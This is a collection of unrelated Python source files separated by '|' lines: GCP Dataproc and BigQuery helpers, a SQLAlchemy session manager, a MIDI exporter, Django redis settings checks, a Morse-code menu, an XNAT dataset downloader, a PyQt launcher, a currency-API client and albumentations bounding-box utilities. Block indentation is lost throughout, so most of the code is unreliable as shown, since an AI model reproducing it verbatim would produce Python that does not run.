cluster_list = list_clusters_with_details(project_id, region)['clusters']
(cluster_id, output_bucket) = (get_cluster_id_by_name(cluster_list, cluster_name))
job_id = submit_pyspark_job(project_id, region, cluster_name, bucket_name, spark_filename)
wait_for_job(project_id, region, job_id)
output = download_output(project_id, cluster_id, output_bucket, job_id)
print('Received job output {}'.format(output))
return output
finally:
if create_new_cluster:
delete_cluster(project_id, region, cluster_name)
spark_file.close()
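# Example invocation (a sketch only; the project ID, zone, bucket and PySpark
# script below are placeholders that must exist in your own GCP environment,
# and valid application-default credentials are assumed):
#
#   output = submit_pyspark_job_to_cluster(
#       project_id='my-project', zone='us-central1-a',
#       cluster_name='demo-cluster', bucket_name='my-staging-bucket',
#       pyspark_file='jobs/wordcount.py')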
#########################
#########################
####### BIGQUERY ########
#########################
#########################
# https://googleapis.github.io/google-cloud-python/latest/bigquery/index.html
def list_datasets(project):
client = bigquery.Client(project=project)
datasets = list(client.list_datasets())
if datasets:
print('Datasets in project {}:'.format(project))
for dataset in datasets:
print('\t{}'.format(dataset.dataset_id))
else:
print('{} project does not contain any datasets'.format(project))
def create_dataset(project, dataset_id):
client = bigquery.Client(project=project)
datasets = list(client.list_datasets())
try:
dataset_ref = client.dataset(dataset_id)
dataset = bigquery.Dataset(dataset_ref)
dataset.location = 'US'
dataset = client.create_dataset(dataset)
print('Dataset {} created'.format(dataset_id))
except:
print('Dataset {} already exists'.format(dataset_id))
def delete_dataset(project, dataset_id):
try:
client = bigquery.Client(project=project)
dataset_ref = client.dataset(dataset_id)
client.delete_dataset(dataset_ref, delete_contents=True)
print('Dataset {} deleted'.format(dataset_id))
except:
print('Dataset {} does not exist'.format(dataset_id))
def list_tables(project, dataset_id):
client = bigquery.Client(project=project)
dataset_ref = client.dataset(dataset_id)
tables = list(client.list_tables(dataset_ref))
if tables:
print('Tables in dataset {}:'.format(dataset_id))
for table in tables:
print('\t{}'.format(table.table_id))
else:
print('{} dataset does not contain any tables'.format(dataset_id))
def create_table(project, dataset_id, table_id):
try:
client = bigquery.Client(project=project)
dataset_ref = client.dataset(dataset_id)
schema = [
bigquery.SchemaField('full_name', 'STRING', mode='REQUIRED'),
bigquery.SchemaField('age', 'INTEGER', mode='REQUIRED'),
]
table_ref = dataset_ref.table(table_id)
table = bigquery.Table(table_ref, schema=schema)
table = client.create_table(table)
print('Table {} created'.format(table_id))
except:
print('Table {} already exists'.format(table_id))
def get_table(project, dataset_id, table_id):
try:
client = bigquery.Client(project=project)
dataset_ref = client.dataset(dataset_id)
table_ref = dataset_ref.table(table_id)
table = client.get_table(table_ref)
print(table.schema)
print(table.description)
print(table.num_rows)
except:
print('Table {} does not exist'.format(table_id))
def insert_in_table(project, table_id, dataset_id, rows):
try:
client = bigquery.Client(project=project)
dataset_ref = client.dataset(dataset_id)
table_ref = dataset_ref.table(table_id)
table = client.get_table(table_ref)
errors = client.insert_rows(table, rows)
except:
print('Table {} does not exist'.format(table_id))
def query_table(project, query):
try:
QUERY = (query)
client = bigquery.Client(project=project)
query_job = client.query(QUERY)
rows = query_job.result()
for row in rows:
print(row)
except:
        print('Query failed: {}'.format(query))
def delete_table(project, dataset_id, table_id):
try:
client = bigquery.Client(project=project)
table_ref = client.dataset(dataset_id).table(table_id)
client.delete_table(table_ref)
print('Table {}:{} deleted'.format(dataset_id, table_id))
except:
print('Table {}:{} does not exist'.format(dataset_id, table_id))
def extract_table_to_gcs(project, dataset_id, table_id, destination_uri):
try:
client = bigquery.Client(project=project)
dataset_ref = client.dataset(dataset_id)
table_ref = dataset_ref.table(table_id)
table = client.get_table(table_ref)
extract_job = client.extract_table(table_ref, destination_uri, location='US')
extract_job.result()
print('Exported {}:{}.{} to {}'.format(project, dataset_id, table_id, destination_uri))
except:
print('Could not export {}:{}.{} to {}'.format(project, dataset_id, table_id, destination_uri))
def load_gcs_parquet_to_table(project, table_id, dataset_id, uri):
try:
client = bigquery.Client(project=project)
dataset_ref = client.dataset(dataset_id)
table_ref = dataset_ref.table(table_id)
job_config = bigquery.LoadJobConfig()
job_config.source_format = bigquery.SourceFormat.PARQUET
load_job = client.load_table_from_uri(uri, table_ref, job_config=job_config)
print('Starting job {}'.format(load_job.job_id))
load_job.result()
print('Job finished')
destination_table = client.get_table(table_ref)
print('Loaded {} rows'.format(destination_table.num_rows))
except:
print('Error')
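# Example flow for the BigQuery helpers above (a sketch; 'my-project' and the
# dataset/table names are placeholders, and GCP credentials are assumed):
#
#   create_dataset('my-project', 'demo_dataset')
#   create_table('my-project', 'demo_dataset', 'people')
#   insert_in_table('my-project', 'people', 'demo_dataset', [('Alice', 30)])
#   query_table('my-project', 'SELECT * FROM demo_dataset.people')
#   delete_dataset('my-project', 'demo_dataset')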
|
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from werkzeug.local import LocalProxy
def get_expected_pathname():
global db_directory
from app.data.get_time import get_date
print ('NAME: path get {}'.format(db_directory + get_date()))
return db_directory + get_date() + '.sql'
from app.configs.constants import db_directory
with open('data/BACKUPDATA', 'a+') as backup_file:
    backup_file.seek(0)  # 'a+' positions the stream at EOF, so rewind before reading
    initial_db_dir = backup_file.read()
db_path = '[unset]'
prev_path = '[none]'
if (initial_db_dir == ''):
print ('No initial db found')
db_path = ''
else:
db_path = initial_db_dir
class SessionManager(object):
def __init__(self):
self.session = None
def get_session(self):
from app.data.database import db_path, prev_path, set_prev_path
if (db_path == prev_path):
return self.session
else:
print('Updating session path: \'{}\' -> \'{}\''.format(prev_path, db_path))
engine = create_engine('sqlite:///' + db_path, convert_unicode=True)
self.session = scoped_session(sessionmaker(autocommit=False, autoflush=False, bind=engine))
set_prev_path(db_path)
return self.session
def set_prev_path(val):
global prev_path
prev_path = val
def init_db():
global db_path
print ('initializing db...')
import app.data.models
engine = create_engine('sqlite:///' + db_path, convert_unicode=True)
Base.metadata.create_all(bind=engine)
def set_path(new_path):
global db_path, engine, db_session, Base
db_path = new_path
print ('SET: path to {}'.format(db_path))
session_manager = SessionManager()
set_path(db_path)
db_session = LocalProxy(session_manager.get_session)
Base = declarative_base()
Base.query = db_session.query_property()
|
import argparse
import os
import sys
import midi
from time import time
from create_pickle import log_replace
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), "src"))
from beatsearch.rhythmcorpus import RhythmCorpus
from beatsearch.utils import print_progress_bar, get_default_beatsearch_rhythms_fpath
def get_args():
parser = argparse.ArgumentParser(description="Exports rhythms to MIDI files")
parser.add_argument("--corpus", type=argparse.FileType('r'),
help="The *.pkl file containing the rhythms to export to MIDI",
default=get_default_beatsearch_rhythms_fpath())
parser.add_argument("--dir", default="./output/midi",
help="Directory to save the MIDI files to")
return parser.parse_args()
if __name__ == "__main__":
args = get_args()
log_replace("Loading rhythms from: %s" % args.corpus.name)
corpus = RhythmCorpus.load(args.corpus)
log_replace("Loaded rhythms from '%s' containing %i rhythms\n" % (args.corpus.name, len(corpus)))
if not os.path.isdir(args.dir):
os.makedirs(args.dir)
rhythm_i = 1
n_rhythms = len(corpus)
t_start = time()
for rhythm in corpus:
print_progress_bar(rhythm_i, n_rhythms,
"Exporting rhythms to MIDI...", "[%i/%i]" %
(rhythm_i, n_rhythms), starting_time=t_start, fill="O")
pattern = rhythm.to_midi()
path = os.path.join(args.dir, "%s.mid" % rhythm.name)
midi.write_midifile(path, pattern)
rhythm_i += 1
|
from __future__ import unicode_literals
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
def get_secure_cache_opts():
if hasattr(settings, 'DJANGO_REDIS_SECURE_CACHE_NAME'):
cache_name = settings.DJANGO_REDIS_SECURE_CACHE_NAME
else:
cache_name = 'default'
secure_cache_options_settings = settings.CACHES[cache_name].get('OPTIONS')
if not secure_cache_options_settings:
raise ImproperlyConfigured(
'OPTIONS must be defined in settings in secure cache settings!')
if secure_cache_options_settings['SERIALIZER'] == 'secure_redis.serializer.SecureSerializer':
return secure_cache_options_settings
secure_cache_options_settings = get_secure_cache_opts()
if secure_cache_options_settings:
if not secure_cache_options_settings.get('REDIS_SECRET_KEY'):
raise ImproperlyConfigured(
'REDIS_SECRET_KEY must be defined in settings in secure cache OPTIONS')
|
from scipy import special
special.eval_chebyt(n, x)  # Chebyshev polynomial of the first kind T_n evaluated at points x
|
from logger.Logger import Logger
from MorseCoder import MorseCoder
from Utils import Utils
class Main:
__logger = Logger()
def __init__(self):
self.__logger.clear_logs()
def __get_next_command(self):
legal_commands = {
"encode": ["encode", "1"],
"decode": ["decode", "2"],
"exit": ["exit", "3", "q"],
}
self.__logger.info("You are now in the main menu.")
self.__logger.info("Legal commands: 'encode' | 'decode' | 'exit'")
input_command = input("Please enter a command: \n").lower()
Utils().clear_terminal()
if input_command in legal_commands["encode"]:
return "encode"
elif input_command in legal_commands["decode"]:
return "decode"
elif input_command in legal_commands["exit"]:
return "exit"
else:
self.__logger.warning("Illegal command: ", input_command)
self.__logger.warning("Please try again...")
return self.__get_next_command()
def main(self):
morse_coder = MorseCoder()
try:
command = self.__get_next_command()
if command == "encode":
morse_coder.start_encode_mode()
elif command == "decode":
morse_coder.start_decode_mode()
else:
quit()
except KeyboardInterrupt:
return self.main()
if __name__ == "__main__":
Main().main()
|
#!/usr/bin/env python
# Copyright 2016-2021 Biomedical Imaging Group Rotterdam, Departments of
# Medical Informatics and Radiology, Erasmus MC, Rotterdam, The Netherlands
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import xnat
import os
import sys
import shutil
from glob import glob
import argparse
from xnat.exceptions import XNATResponseError
# General settings
valid_datasets = ['Lipo', 'Desmoid', 'GIST', 'Liver', 'CRLM', 'Melanoma']
def main():
parser = argparse.ArgumentParser(description='WORC Database experiments')
parser.add_argument('-dataset', '--dataset', metavar='dataset',
dest='dataset', type=str, required=False,
default='Lipo',
help='Name of dataset to be downloaded.')
parser.add_argument('-datafolder', '--datafolder', metavar='datafolder',
dest='datafolder', type=str, required=False,
help='Folder to download the dataset to.')
parser.add_argument('-nsubjects', '--nsubjects', metavar='nsubjects',
dest='nsubjects', type=str, required=False,
default='all',
help='Number of subjects to be downloaded.')
args = parser.parse_args()
# Run the experiment
download_WORCDatabase(dataset=args.dataset,
datafolder=args.datafolder,
nsubjects=args.nsubjects)
def download_subject(project, subject, datafolder, session, verbose=False):
"""Download data of a single XNAT subject."""
# Download all data and keep track of resources
download_counter = 0
resource_labels = list()
for e in subject.experiments:
resmap = {}
experiment = subject.experiments[e]
for s in experiment.scans:
scan = experiment.scans[s]
print(("\tDownloading patient {}, experiment {}, scan {}.").format(subject.label, experiment.label,
scan.id))
for res in scan.resources:
resource_label = scan.resources[res].label
if resource_label == 'NIFTI':
# Create output directory
outdir = datafolder + '/{}'.format(subject.label)
if not os.path.exists(outdir):
os.makedirs(outdir)
resmap[resource_label] = scan
print(f'resource is {resource_label}')
scan.resources[res].download_dir(outdir)
resource_labels.append(resource_label)
download_counter += 1
    # Parse resources and print warnings if they do not meet the requirements
subject_name = subject.label
if download_counter == 0:
print(f'\t[WARNING] Skipping subject {subject_name}: no (suitable) resources found.')
return False
if 'NIFTI' not in resource_labels:
print(f'\t[WARNING] Skipping subject {subject_name}: no NIFTI resources found.')
return False
    # Reorder files into an easier-to-read structure
NIFTI_files = glob(os.path.join(outdir, '*', 'scans', '*', 'resources', 'NIFTI', 'files', '*.nii.gz'))
for NIFTI_file in NIFTI_files:
basename = os.path.basename(NIFTI_file)
shutil.move(NIFTI_file, os.path.join(outdir, basename))
for folder in glob(os.path.join(outdir, '*')):
if os.path.isdir(folder):
shutil.rmtree(folder)
return True
def download_project(project_name, xnat_url, datafolder, nsubjects='all',
verbose=True, dataset='all'):
"""Download data of full XNAT project."""
    # Connect to XNAT and retrieve the project
with xnat.connect(xnat_url) as session:
project = session.projects[project_name]
# Create the data folder if it does not exist yet
datafolder = os.path.join(datafolder, project_name)
if not os.path.exists(datafolder):
os.makedirs(datafolder)
subjects_len = len(project.subjects)
if nsubjects != 'all':
            nsubjects = min(int(nsubjects), subjects_len)
subjects_counter = 1
downloaded_subjects_counter = 0
for s in range(0, subjects_len):
s = project.subjects[s]
            if dataset != 'all':
# Check if patient belongs to required dataset
subject_dataset = s.fields['dataset']
if subject_dataset != dataset:
print(f'\t Skipping subject {s.label}: belongs to a different dataset than {dataset}.')
continue
            print(f'Processing subject {subjects_counter}/{subjects_len}')
subjects_counter += 1
success = download_subject(project_name, s, datafolder, session,
verbose)
if success:
downloaded_subjects_counter += 1
# Stop downloading if we have reached the required number of subjects
if downloaded_subjects_counter == nsubjects:
break
# Disconnect the session
session.disconnect()
if nsubjects != 'all':
if downloaded_subjects_counter < nsubjects:
raise ValueError(f'Number of subjects downloaded {downloaded_subjects_counter} is smaller than the number required {nsubjects}.')
print('Done downloading!')
def download_WORCDatabase(dataset=None, datafolder=None, nsubjects='all'):
"""Download a dataset from the WORC Database.
Download all Nifti images and segmentations from a dataset from the WORC
database from https://xnat.bmia.nl/data/projects/worc
dataset: string, default None
If None, download the full XNAT project. If string, download one
of the six datasets. Valid values: Lipo, Desmoid, GIST, Liver, CRLM,
Melanoma
"""
# Check if dataset is valid
if dataset not in valid_datasets:
raise KeyError(f"{dataset} is not a valid dataset, should be one of {valid_datasets}.")
if datafolder is None:
# Download data to path in which this script is located + Data
cwd = os.getcwd()
datafolder = os.path.join(cwd, 'Data')
if not os.path.exists(datafolder):
os.makedirs(datafolder)
xnat_url = 'https://xnat.bmia.nl'
project_name = 'worc'
download_project(project_name, xnat_url, datafolder, nsubjects=nsubjects,
verbose=True, dataset=dataset)
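# Direct-call sketch (placeholder arguments; assumes the public XNAT server is
# reachable and that downloading ten Lipo subjects is acceptable):
#
#   download_WORCDatabase(dataset='Lipo', datafolder=None, nsubjects=10)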
if __name__ == '__main__':
main()
|
import sys
import sip
from PyQt4 import QtGui, QtCore
from epubcreator.gui import main_window
from epubcreator import config, version
if __name__ == "__main__":
    # This method needs to be called because otherwise PyQt crashes when Python shuts down (at least on Windows).
    # It does not always crash, only under certain circumstances. For example, it used to crash for me when the form
    # had around 11 or 12 widgets.
# http://pyqt.sourceforge.net/Docs/PyQt5/pyqt4_differences.html, dice lo siguiente:
# When the Python interpreter exits PyQt4 (by default) calls the C++ destructor of all wrapped instances
# that it owns. This happens in a random order and can therefore cause the interpreter to crash. This behavior
# can be disabled by calling the sip.setdestroyonexit() function.
# PyQt5 always calls sip.setdestroyonexit() automatically.
sip.setdestroyonexit(False)
QtGui.QApplication.setDesktopSettingsAware(True)
app = QtGui.QApplication(sys.argv)
app.setWindowIcon(QtGui.QIcon(":/epublibre_logo.png"))
    # Try to load the Spanish translations for all of Qt's standard dialogs, buttons, etc.
qtTranslator = QtCore.QTranslator()
if qtTranslator.load(config.getQtSpanishTranslation()):
app.installTranslator(qtTranslator)
QtCore.QCoreApplication.setApplicationName(version.APP_NAME)
QtCore.QCoreApplication.setOrganizationName(version.ORGANIZATION)
QtCore.QCoreApplication.setOrganizationDomain(version.ORGANIZATION_DOMAIN)
QtCore.QCoreApplication.setApplicationVersion(version.VERSION)
mainWindow = main_window.MainWindow()
mainWindow.show()
sys.exit(app.exec_())
|
'''
Using the Free Currency Converter API (free.currconv.com) to get some basic
currency-conversion pairings in real-time.
'''
from urllib.request import urlopen
import json
'''
List of all possible currency pairings
available on this API.
'''
def get_api_key():
with open('keys.json','r') as keys:
data = json.load(keys)
api_key = data['api_key']
return api_key
def get_currency_pairs():
    '''
    Build every available currency pairing (each unordered combination
    of two currencies returned by the API).
    '''
api_key = get_api_key()
url = f'https://free.currconv.com/api/v7/currencies?apiKey={api_key}'
with urlopen(url) as response:
source = response.read()
data = json.loads(source)
currencies = []
for currency in data['results']:
currencies.append(currency)
    pairs = []
    for i, currency in enumerate(currencies):
        for other in currencies[i + 1:]:
            pairs.append(f'{currency}_{other}')
    return pairs
pairs = [
"EUR_USD",
"EUR_GBP",
"GBP_USD",
"USD_JPY",
"AUD_USD",
"USD_CHF",
"NZD_USD",
"USD_CAD",
"USD_ZAR"
]
def get_currency(req_pair):
api_key = get_api_key()
url = (
'https://free.currconv.com/api/v7/convert'
f'?q={req_pair}'
'&compact=ultra'
f'&apiKey={api_key}'
)
with urlopen(url) as response:
source = response.read()
data = json.loads(source)
print(data)
def tests():
for pair in pairs:
get_currency(pair)
# tests()
get_currency_pairs()
|
from .client import qBittorrentClient
|
from __future__ import division
from albumentations.core.utils import DataProcessor
import numpy as np
__all__ = [
"normalize_bbox",
"denormalize_bbox",
"normalize_bboxes",
"denormalize_bboxes",
"calculate_bbox_area",
"filter_bboxes_by_visibility",
"convert_bbox_to_albumentations",
"convert_bbox_from_albumentations",
"convert_bboxes_to_albumentations",
"convert_bboxes_from_albumentations",
"BboxProcessor",
]
class BboxProcessor(DataProcessor):
@property
def default_data_name(self):
return "bboxes"
def ensure_data_valid(self, data):
for data_name in self.data_fields:
data_exists = data_name in data and len(data[data_name])
if data_exists and len(data[data_name][0]) < 5:
if self.params.label_fields is None:
raise ValueError(
"Please specify 'label_fields' in 'bbox_params' or add labels to the end of bbox "
"because bboxes must have labels"
)
if self.params.label_fields:
if not all(l in data.keys() for l in self.params.label_fields):
raise ValueError("Your 'label_fields' are not valid - them must have same names as params in dict")
def filter(self, data, rows, cols):
return filter_bboxes(
data, rows, cols, min_area=self.params.min_area, min_visibility=self.params.min_visibility
)
def check(self, data, rows, cols):
return check_bboxes(data)
def convert_from_albumentations(self, data, rows, cols):
return convert_bboxes_from_albumentations(data, self.params.format, rows, cols, check_validity=True)
def convert_to_albumentations(self, data, rows, cols):
return convert_bboxes_to_albumentations(data, self.params.format, rows, cols, check_validity=True)
def normalize_bbox(bbox, rows, cols):
"""Normalize coordinates of a bounding box. Divide x-coordinates by image width and y-coordinates
by image height.
Args:
bbox (tuple): Denormalized bounding box `(x_min, y_min, x_max, y_max)`.
rows (int): Image height.
cols (int): Image width.
Returns:
tuple: Normalized bounding box `(x_min, y_min, x_max, y_max)`.
Raises:
ValueError: If rows or cols is less or equal zero
"""
(x_min, y_min, x_max, y_max), tail = bbox[:4], tuple(bbox[4:])
if rows <= 0:
raise ValueError("Argument rows must be positive integer")
if cols <= 0:
raise ValueError("Argument cols must be positive integer")
x_min, x_max = x_min / cols, x_max / cols
y_min, y_max = y_min / rows, y_max / rows
return (x_min, y_min, x_max, y_max) + tail
def denormalize_bbox(bbox, rows, cols):
"""Denormalize coordinates of a bounding box. Multiply x-coordinates by image width and y-coordinates
by image height. This is an inverse operation for :func:`~albumentations.augmentations.bbox.normalize_bbox`.
Args:
bbox (tuple): Normalized bounding box `(x_min, y_min, x_max, y_max)`.
rows (int): Image height.
cols (int): Image width.
Returns:
tuple: Denormalized bounding box `(x_min, y_min, x_max, y_max)`.
Raises:
ValueError: If rows or cols is less or equal zero
"""
(x_min, y_min, x_max, y_max), tail = bbox[:4], tuple(bbox[4:])
if rows <= 0:
raise ValueError("Argument rows must be positive integer")
if cols <= 0:
raise ValueError("Argument cols must be positive integer")
x_min, x_max = x_min * cols, x_max * cols
y_min, y_max = y_min * rows, y_max * rows
return (x_min, y_min, x_max, y_max) + tail
def normalize_bboxes(bboxes, rows, cols):
"""Normalize a list of bounding boxes.
Args:
bboxes (List[tuple]): Denormalized bounding boxes `[(x_min, y_min, x_max, y_max)]`.
rows (int): Image height.
cols (int): Image width.
Returns:
List[tuple]: Normalized bounding boxes `[(x_min, y_min, x_max, y_max)]`.
"""
return [normalize_bbox(bbox, rows, cols) for bbox in bboxes]
def denormalize_bboxes(bboxes, rows, cols):
"""Denormalize a list of bounding boxes.
Args:
bboxes (List[tuple]): Normalized bounding boxes `[(x_min, y_min, x_max, y_max)]`.
rows (int): Image height.
cols (int): Image width.
Returns:
List[tuple]: Denormalized bounding boxes `[(x_min, y_min, x_max, y_max)]`.
"""
return [denormalize_bbox(bbox, rows, cols) for bbox in bboxes]
def calculate_bbox_area(bbox, rows, cols):
"""Calculate the area of a bounding box in pixels.
Args:
bbox (tuple): A bounding box `(x_min, y_min, x_max, y_max)`.
rows (int): Image height.
cols (int): Image width.
Return:
int: Area of a bounding box in pixels.
"""
bbox = denormalize_bbox(bbox, rows, cols)
x_min, y_min, x_max, y_max = bbox[:4]
area = (x_max - x_min) * (y_max - y_min)
return area
def filter_bboxes_by_visibility(
original_shape, bboxes, transformed_shape, transformed_bboxes, threshold=0.0, min_area=0.0
):
"""Filter bounding boxes and return only those boxes whose visibility after transformation is above
    the threshold and whose minimal area of the bounding box in pixels is more than min_area.
Args:
original_shape (tuple): Original image shape `(height, width)`.
bboxes (List[tuple]): Original bounding boxes `[(x_min, y_min, x_max, y_max)]`.
transformed_shape (tuple): Transformed image shape `(height, width)`.
transformed_bboxes (List[tuple]): Transformed bounding boxes `[(x_min, y_min, x_max, y_max)]`.
threshold (float): visibility threshold. Should be a value in the range [0.0, 1.0].
min_area (float): Minimal area threshold.
Returns:
List[tuple]: Filtered bounding boxes `[(x_min, y_min, x_max, y_max)]`.
"""
img_height, img_width = original_shape[:2]
transformed_img_height, transformed_img_width = transformed_shape[:2]
visible_bboxes = []
for bbox, transformed_bbox in zip(bboxes, transformed_bboxes):
if not all(0.0 <= value <= 1.0 for value in transformed_bbox[:4]):
continue
bbox_area = calculate_bbox_area(bbox, img_height, img_width)
transformed_bbox_area = calculate_bbox_area(transformed_bbox, transformed_img_height, transformed_img_width)
if transformed_bbox_area < min_area:
continue
visibility = transformed_bbox_area / bbox_area
if visibility >= threshold:
visible_bboxes.append(transformed_bbox)
return visible_bboxes
def convert_bbox_to_albumentations(bbox, source_format, rows, cols, check_validity=False):
"""Convert a bounding box from a format specified in `source_format` to the format used by albumentations:
normalized coordinates of bottom-left and top-right corners of the bounding box in a form of
`(x_min, y_min, x_max, y_max)` e.g. `(0.15, 0.27, 0.67, 0.5)`.
Args:
bbox (tuple): A bounding box tuple.
source_format (str): format of the bounding box. Should be 'coco', 'pascal_voc', or 'yolo'.
check_validity (bool): Check if all boxes are valid boxes.
rows (int): Image height.
cols (int): Image width.
Returns:
tuple: A bounding box `(x_min, y_min, x_max, y_max)`.
Note:
The `coco` format of a bounding box looks like `(x_min, y_min, width, height)`, e.g. (97, 12, 150, 200).
The `pascal_voc` format of a bounding box looks like `(x_min, y_min, x_max, y_max)`, e.g. (97, 12, 247, 212).
        The `yolo` format of a bounding box looks like `(x, y, width, height)`, e.g. (0.3, 0.1, 0.05, 0.07),
        where `x` and `y` are the coordinates of the center of the box; all values are normalized by the image height and width.
Raises:
        ValueError: if `source_format` is not equal to `coco`, `pascal_voc`, or `yolo`.
        ValueError: If in YOLO format any coordinate is not in the range (0, 1].
"""
if source_format not in {"coco", "pascal_voc", "yolo"}:
raise ValueError(
"Unknown source_format {}. Supported formats are: 'coco', 'pascal_voc' and 'yolo'".format(source_format)
)
if isinstance(bbox, np.ndarray):
bbox = bbox.tolist()
if source_format == "coco":
(x_min, y_min, width, height), tail = bbox[:4], tuple(bbox[4:])
x_max = x_min + width
y_max = y_min + height
elif source_format == "yolo":
# https://github.com/pjreddie/darknet/blob/f6d861736038da22c9eb0739dca84003c5a5e275/scripts/voc_label.py#L12
bbox, tail = bbox[:4], tuple(bbox[4:])
_bbox = np.array(bbox[:4])
if np.any((_bbox <= 0) | (_bbox > 1)):
raise ValueError("In YOLO format all labels must be float and in range (0, 1]")
x, y, width, height = np.round(denormalize_bbox(bbox, rows, cols))
x_min = x - width / 2 + 1
x_max = x_min + width
y_min = y - height / 2 + 1
y_max = y_min + height
else:
(x_min, y_min, x_max, y_max), tail = bbox[:4], tuple(bbox[4:])
bbox = (x_min, y_min, x_max, y_max) + tail
bbox = normalize_bbox(bbox, rows, cols)
if check_validity:
check_bbox(bbox)
return bbox
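# Worked example for the conversion above (a sketch, on a 480x640 image):
#   convert_bbox_to_albumentations((97, 12, 150, 200), 'coco', rows=480, cols=640)
#   -> (0.1515625, 0.025, 0.3859375, 0.44166...), i.e. normalized (x_min, y_min, x_max, y_max)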
def convert_bbox_from_albumentations(bbox, target_format, rows, cols, check_validity=False):
"""Convert a bounding box from the format used by albumentations to a format, specified in `target_format`.
Args:
bbox (tuple): An albumentation bounding box `(x_min, y_min, x_max, y_max)`.
target_format (str): required format of the output bounding box. Should be 'coco', 'pascal_voc' or 'yolo'.
rows (int): Image height.
cols (int): Image width.
check_validity (bool): Check if all boxes are valid boxes.
Returns:
tuple: A bounding box.
Note:
The `coco` format of a bounding box looks like `[x_min, y_min, width, height]`, e.g. [97, 12, 150, 200].
The `pascal_voc` format of a bounding box looks like `[x_min, y_min, x_max, y_max]`, e.g. [97, 12, 247, 212].
The `yolo` format of a bounding box looks like `[x, y, width, height]`, e.g. [0.3, 0.1, 0.05, 0.07].
Raises:
ValueError: if `target_format` is not equal to `coco`, `pascal_voc` or `yolo`.
"""
if target_format not in {"coco", "pascal_voc", "yolo"}:
raise ValueError(
"Unknown target_format {}. Supported formats are: 'coco', 'pascal_voc' and 'yolo'".format(target_format)
)
if check_validity:
check_bbox(bbox)
bbox = denormalize_bbox(bbox, rows, cols)
if target_format == "coco":
(x_min, y_min, x_max, y_max), tail = bbox[:4], tuple(bbox[4:])
width = x_max - x_min
height = y_max - y_min
bbox = (x_min, y_min, width, height) + tail
elif target_format == "yolo":
# https://github.com/pjreddie/darknet/blob/f6d861736038da22c9eb0739dca84003c5a5e275/scripts/voc_label.py#L12
(x_min, y_min, x_max, y_max), tail = bbox[:4], bbox[4:]
x = (x_min + x_max) / 2 - 1
y = (y_min + y_max) / 2 - 1
width = x_max - x_min
height = y_max - y_min
bbox = normalize_bbox((x, y, width, height) + tail, rows, cols)
return bbox
def convert_bboxes_to_albumentations(bboxes, source_format, rows, cols, check_validity=False):
"""Convert a list bounding boxes from a format specified in `source_format` to the format used by albumentations
"""
return [convert_bbox_to_albumentations(bbox, source_format, rows, cols, check_validity) for bbox in bboxes]
def convert_bboxes_from_albumentations(bboxes, target_format, rows, cols, check_validity=False):
"""Convert a list of bounding boxes from the format used by albumentations to a format, specified
in `target_format`.
Args:
bboxes (List[tuple]): List of albumentation bounding box `(x_min, y_min, x_max, y_max)`.
target_format (str): required format of the output bounding box. Should be 'coco', 'pascal_voc' or 'yolo'.
rows (int): Image height.
cols (int): Image width.
check_validity (bool): Check if all boxes are valid boxes.
Returns:
list[tuple]: List of bounding box.
"""
return [convert_bbox_from_albumentations(bbox, target_format, rows, cols, check_validity) for bbox in bboxes]
def check_bbox(bbox):
"""Check if bbox boundaries are in range 0, 1 and minimums are lesser then maximums"""
for name, value in zip(["x_min", "y_min", "x_max", "y_max"], bbox[:4]):
if not 0 <= value <= 1:
raise ValueError(
"Expected {name} for bbox {bbox} "
"to be in the range [0.0, 1.0], got {value}.".format(bbox=bbox, name=name, value=value)
)
x_min, y_min, x_max, y_max = bbox[:4]
if x_max <= x_min:
raise ValueError("x_max is less than or equal to x_min for bbox {bbox}.".format(bbox=bbox))
if y_max <= y_min:
raise ValueError("y_max is less than or equal to y_min for bbox {bbox}.".format(bbox=bbox))
def check_bboxes(bboxes):
"""Check if bboxes boundaries are in range 0, 1 and minimums are lesser then maximums"""
for bbox in bboxes:
check_bbox(bbox)
def filter_bboxes(bboxes, rows, cols, min_area=0.0, min_visibility=0.0):
"""Remove bounding boxes that either lie outside of the visible area by more then min_visibility
or whose area in pixels is under the threshold set by `min_area`. Also it crops boxes to final image size.
Args:
bboxes (List[tuple]): List of albumentation bounding box `(x_min, y_min, x_max, y_max)`.
rows (int): Image height.
cols (int): Image width.
        min_area (float): Minimum area of a bounding box. All bounding boxes whose visible area in pixels
            is less than this value will be removed. Default: 0.0.
        min_visibility (float): Minimum fraction of area for a bounding box to remain in the list. Default: 0.0.
Returns:
List[tuple]: List of bounding box.
"""
resulting_boxes = []
for bbox in bboxes:
transformed_box_area = calculate_bbox_area(bbox, rows, cols)
bbox, tail = tuple(np.clip(bbox[:4], 0, 1.0)), tuple(bbox[4:])
clipped_box_area = calculate_bbox_area(bbox, rows, cols)
if not transformed_box_area or clipped_box_area / transformed_box_area <= min_visibility:
continue
else:
bbox = tuple(np.clip(bbox[:4], 0, 1.0))
if calculate_bbox_area(bbox, rows, cols) <= min_area:
continue
resulting_boxes.append(bbox + tail)
return resulting_boxes
def union_of_bboxes(height, width, bboxes, erosion_rate=0.0):
"""Calculate union of bounding boxes.
Args:
height (float): Height of image or space.
width (float): Width of image or space.
bboxes (List[tuple]): List like bounding boxes. Format is `[(x_min, y_min, x_max, y_max)]`.
        erosion_rate (float): How much each bounding box can be shrunk, useful for erosive cropping.
            Set this in the range [0, 1]. 0 will not be erosive at all, while 1.0 can make any bbox lose its volume entirely.
Returns:
tuple: A bounding box `(x_min, y_min, x_max, y_max)`.
"""
x1, y1 = width, height
x2, y2 = 0, 0
for bbox in bboxes:
x_min, y_min, x_max, y_max = bbox[:4]
w, h = x_max - x_min, y_max - y_min
lim_x1, lim_y1 = x_min + erosion_rate * w, y_min + erosion_rate * h
lim_x2, lim_y2 = x_max - erosion_rate * w, y_max - erosion_rate * h
x1, y1 = np.min([x1, lim_x1]), np.min([y1, lim_y1])
x2, y2 = np.max([x2, lim_x2]), np.max([y2, lim_y2])
return x1, y1, x2, y2
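# Worked example for union_of_bboxes (a sketch, using normalized boxes on a unit space):
#   union_of_bboxes(height=1.0, width=1.0,
#                   bboxes=[(0.1, 0.2, 0.4, 0.5), (0.3, 0.1, 0.6, 0.4)])
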